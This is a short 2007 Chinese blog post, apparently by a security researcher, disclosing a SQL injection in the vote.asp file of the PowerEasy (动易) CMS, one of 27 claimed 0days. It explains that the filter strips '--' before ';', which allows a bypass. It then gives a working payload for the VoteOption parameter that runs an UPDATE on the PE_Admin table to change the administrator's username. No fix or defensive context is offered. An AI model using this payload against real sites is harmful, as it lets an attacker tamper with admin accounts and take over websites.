动易27个0day之一:vote.asp注入

    [阴 October 31, 2007 15:07 | by ]
by:传说中的疯子
动易27个0day之一:vote.asp注入
本来动易只看到了26个。
但是现在外面竟然流传了一个我没发现的,痛苦中。
竟然连这么简单的漏洞都没发现。
今天听到这个文件有问题。
拿到组件调试一下:

以下是一些细节。
VoteOption参数注入(其他的参数就没看了)
他们先过滤了"--"再过滤";"

测试方法:
VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时,修改管理员的用户名。
Tags: , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(11250)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive